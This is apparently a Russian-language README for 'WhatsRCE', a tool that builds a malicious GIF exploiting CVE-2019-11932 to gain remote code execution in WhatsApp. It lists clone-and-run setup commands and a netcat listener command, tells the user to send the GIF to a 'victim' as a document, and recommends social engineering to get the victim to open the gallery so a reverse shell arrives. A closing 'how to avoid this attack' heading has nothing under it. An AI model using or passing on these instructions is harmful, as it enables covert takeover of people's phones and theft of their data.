WhatsRCE
Это автоматическая генерация полезной нагрузки для CVE-2019-11932 (удалённое выполнение кода в WhatsApp)
- Автоматическая установка GCC (безвредная команда, вы можете убедиться, что это открытый исходный код)
- Сохранение в файл .GIF
Как использовать?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
Как получить шелл?
- Просто отправьте файл .GIF жертве КАК ДОКУМЕНТ, А НЕ КАК ИЗОБРАЖЕНИЕ
- И запустите nc / netcat на порту, который вы указали в инструменте WhatsRCE {nc -lnvp ваш_порт}
- Вы можете использовать методы социальной инженерии, чтобы жертва захотела запустить этот эксплойт
- Попросите жертву открыть галерею через WhatsApp и отправить любые фотографии (не обязательно, достаточно просто зайти в галерею, это не проблема) — через несколько секунд вы получите шелл-соединение с жертвой
или просто посмотрите это
ДЕМО-ВИДЕО
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
если ссылка выше недоступна
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
Как избежать этой атаки?